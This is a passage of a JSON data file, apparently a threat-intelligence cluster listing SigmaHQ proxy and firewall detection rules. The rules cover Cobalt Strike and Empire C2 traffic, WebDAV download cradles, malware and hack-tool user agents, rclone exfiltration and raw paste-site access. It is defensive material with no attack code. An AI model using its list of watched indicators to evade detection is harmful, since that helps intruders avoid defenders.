transit. Ensure that an encrypted channels is used for all administrative account access.\n", "meta": { "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", "creation_date": "2019-03-26", "falsepositive": [ "Unknown" ], "filename": "net_firewall_cleartext_protocols.yml", "level": "low", "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", "value": "Cleartext Protocol Usage" }, { "description": "Detects Baby Shark C2 Framework default communication patterns", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-06-09", "falsepositive": [ "Unlikely" ], "filename": "proxy_hktl_baby_shark_default_agent_url.yml", "level": "critical", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", "value": "HackTool - BabyShark Agent Default URL Pattern" }, { "description": "Detects WebDav DownloadCradle", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-04-06", "falsepositive": [ "Administrative scripts that download files from the Internet", "Administrative scripts that retrieve 
certain website contents", "Legitimate WebDAV administration" ], "filename": "proxy_downloadcradle_webdav.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", "value": "Windows WebDAV User Agent" }, { "description": "Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).", "meta": { "author": "Markus Neis, Florian Roth (Nextron Systems)", "creation_date": "2024-02-15", "falsepositive": [ "Unknown" ], "filename": "proxy_hktl_cobalt_strike_malleable_c2_requests.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_cobalt_strike_malleable_c2_requests.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f3f21ce1-cdef-4bfc-8328-ed2e826f5fac", "value": "HackTool - CobaltStrike Malleable Profile Patterns - Proxy" }, { "description": "Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.\n", "meta": { "author": "Ahmed Farouk", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "proxy_webdav_external_execution.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html", "https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4", "https://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html", "https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_webdav_external_execution.yml" ], "tags": [ "attack.initial-access", "attack.t1584", "attack.t1566" ] }, "related": [ { "dest-uuid": "7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ae64f96-72b6-48b3-ad3d-e71dff6c6398", "value": "Suspicious External WebDAV Execution" }, { "description": "Detects user agent and URI paths used by empire agents", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-13", "falsepositive": [ "Valid requests with this exact user agent to server scripts of the defined names" ], "filename": "proxy_hktl_empire_ua_uri_patterns.yml", "level": "high", "logsource.category": 
"proxy", "logsource.product": "No established product", "refs": [ "https://github.com/BC-SECURITY/Empire", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", "value": "HackTool - Empire UserAgent URI Combo" }, { "description": "Detects download of certain file types from hosts in suspicious TLDs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-11-07", "falsepositive": [ "All kinds of software downloads" ], "filename": "proxy_download_susp_tlds_blacklist.yml", "level": "low", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", "https://www.spamhaus.org/statistics/tlds/", "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml" ], "tags": [ "attack.initial-access", "attack.t1566", "attack.execution", "attack.t1203", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", "value": "Download 
From Suspicious TLD - Blacklist" }, { "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_frameworks.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_frameworks.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", "value": "Exploit Framework User Agent" }, { "description": "Detects Bitsadmin connections to domains with uncommon TLDs", "meta": { "author": "Florian Roth (Nextron Systems), Tim Shelton", "creation_date": "2019-03-07", "falsepositive": [ "Rare programs that use Bitsadmin and update from regional TLDs e.g. 
.uk or .ca" ], "filename": "proxy_ua_bitsadmin_susp_tld.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://twitter.com/jhencinski/status/1102695118455349248", "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001", "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", "value": "Bitsadmin to Uncommon TLD" }, { "description": "Detects suspicious malformed user agent strings in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_susp.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", "value": "Suspicious User Agent" }, { "description": "Detects suspicious user agent strings used by malware in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems), 
X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2017-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_malware.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://www.botopedia.org/search?searchword=scan&searchphrase=all", "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q", "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large", "https://twitter.com/crep1x/status/1635034100213112833", "https://perishablepress.com/blacklist/ua-2013.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_malware.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", "value": "Malware User Agent" }, { "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-21", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_cryptominer.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_cryptominer.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, 
"related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", "value": "Crypto Miner User Agent" }, { "description": "Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.", "meta": { "author": "Florian Roth (Nextron Systems), Brian Ingram (update)", "creation_date": "2022-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_susp_base64.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://deviceatlas.com/blog/list-of-user-agent-strings#desktop", "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp_base64.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", "value": "Potential Base64 Encoded User-Agent" }, { "description": "Detects Windows PowerShell Web Access", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-13", "falsepositive": [ "Administrative scripts that download files from the Internet", "Administrative scripts that retrieve certain website contents" ], "filename": "proxy_ua_powershell.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_powershell.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": 
"df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8557060-9221-4448-8794-96320e6f3e74", "value": "Windows PowerShell User Agent" }, { "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", "meta": { "author": "Janantha Marasinghe", "creation_date": "2022-10-18", "falsepositive": [ "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" ], "filename": "proxy_ua_rclone.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", "https://rclone.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_rclone.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", "value": "Rclone Activity via Proxy" }, { "description": "Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.", "meta": { "author": "Gavin Knapp", "creation_date": "2023-03-16", "falsepositive": [ "Legitimate use of IPFS being used in the organisation. However the cs-uri regex looking for a user email will likely negate this." 
], "filename": "proxy_susp_ipfs_cred_harvest.yml", "level": "low", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://blog.talosintelligence.com/ipfs-abuse/", "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638", "https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml" ], "tags": [ "attack.credential-access", "attack.t1056" ] }, "related": [ { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eb6c2004-1cef-427f-8885-9042974e5eb6", "value": "Suspicious Network Communication With IPFS" }, { "description": "Detects executable downloads from suspicious remote systems", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-13", "falsepositive": [ "All kind of software downloads" ], "filename": "proxy_download_susp_tlds_whitelist.yml", "level": "low", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml" ], "tags": [ "attack.initial-access", "attack.t1566", "attack.execution", "attack.t1203", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"b5de2919-b74a-4805-91a7-5049accbaefe", "value": "Download From Suspicious TLD - Whitelist" }, { "description": "Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Thurein Oo", "creation_date": "2023-11-08", "falsepositive": [ "Legitimate usage of the BIG IP REST API to execute command for administration purposes" ], "filename": "proxy_f5_tm_utility_bash_api_request.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash", "https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029", "https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b59c98c6-95e8-4d65-93ee-f594dfb96b17", "value": "F5 BIG-IP iControl Rest API Command Execution - Proxy" }, { "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-11-08", "falsepositive": [ "Software downloads" ], "filename": "proxy_download_susp_dyndns.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_dyndns.yml" ], "tags": [ 
"attack.defense-evasion", "attack.command-and-control", "attack.t1105", "attack.t1568" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7bd9c723-2f78-4309-82c5-47cad406572b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", "value": "Download from Suspicious Dyndns Hosts" }, { "description": "Detect the update check performed by Advanced IP/Port Scanner utilities.", "meta": { "author": "Axel Olsson", "creation_date": "2022-08-14", "falsepositive": [ "Expected if you legitimately use the Advanced IP or Port Scanner utilities in your environement." ], "filename": "proxy_pua_advanced_ip_scanner_update_check.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.advanced-port-scanner.com/", "https://www.advanced-ip-scanner.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml" ], "tags": [ "attack.discovery", "attack.t1590" ] }, "related": [ { "dest-uuid": "9d48cab2-7929-4812-ad22-f536665f0109", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", "value": "PUA - Advanced IP/Port Scanner Update Check" }, { "description": "Detects suspicious user agent strings used in APT malware in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems), Markus Neis", "creation_date": "2019-11-12", "falsepositive": [ "Old browsers" ], "filename": "proxy_ua_apt.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_apt.yml" ], "tags": [ 
"attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", "value": "APT User Agent" }, { "description": "Detects suspicious encoded User-Agent strings, as seen used by some malware.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-04", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_base64_encoded.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://deviceatlas.com/blog/list-of-user-agent-strings#desktop", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_base64_encoded.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d443095b-a221-4957-a2c4-cd1756c9b747", "value": "Suspicious Base64 Encoded User-Agent" }, { "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-10", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_bitsadmin_susp_ip.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001", "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", "value": "Bitsadmin to Uncommon IP Server Address" }, { "description": "Detects a flashplayer update from an unofficial location", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-10-25", "falsepositive": [ "Unknown flash download locations" ], "filename": "proxy_susp_flash_download_loc.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml" ], "tags": [ "attack.initial-access", "attack.t1189", "attack.execution", "attack.t1204.002", "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", "value": "Flash Player Update from Suspicious Location" }, { "description": "Detects suspicious user agent strings user by hack tools in proxy logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_hacktool.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ 
"https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_hacktool.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "attack.credential-access", "attack.t1110" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", "value": "Hack Tool User Agent" }, { "description": "Detects a potentially suspicious empty user agent strings in proxy log.\nCould potentially indicate an uncommon request method.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-07-08", "falsepositive": [ "Unknown" ], "filename": "proxy_ua_empty.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://twitter.com/Carlos_Perez/status/883455096645931008", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_empty.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", "value": "HTTP Request With Empty User Agent" }, { "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-04-15", "falsepositive": [ 
"Unknown" ], "filename": "proxy_pwndrop.yml", "level": "critical", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://breakdev.org/pwndrop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_pwndrop.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001", "attack.t1102.001", "attack.t1102.003" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9c99724c-a483-4d60-ad9d-7f004e42e8e8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", "value": "PwnDrp Access" }, { "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-05", "falsepositive": [ "User activity (e.g. 
developer that shared and copied code snippets and used the raw link instead of just copy & paste)" ], "filename": "proxy_raw_paste_service_access.yml", "level": "high", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://www.virustotal.com/gui/domain/paste.ee/relations", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_raw_paste_service_access.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001", "attack.t1102.001", "attack.t1102.003", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9c99724c-a483-4d60-ad9d-7f004e42e8e8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", "value": "Raw Paste Service Access" }, { "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-06-05", "falsepositive": [ "Legitimate use of Telegram bots in the company" ], "filename": "proxy_telegram_api.yml", "level": "medium", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_telegram_api.yml" ], "tags": [ 
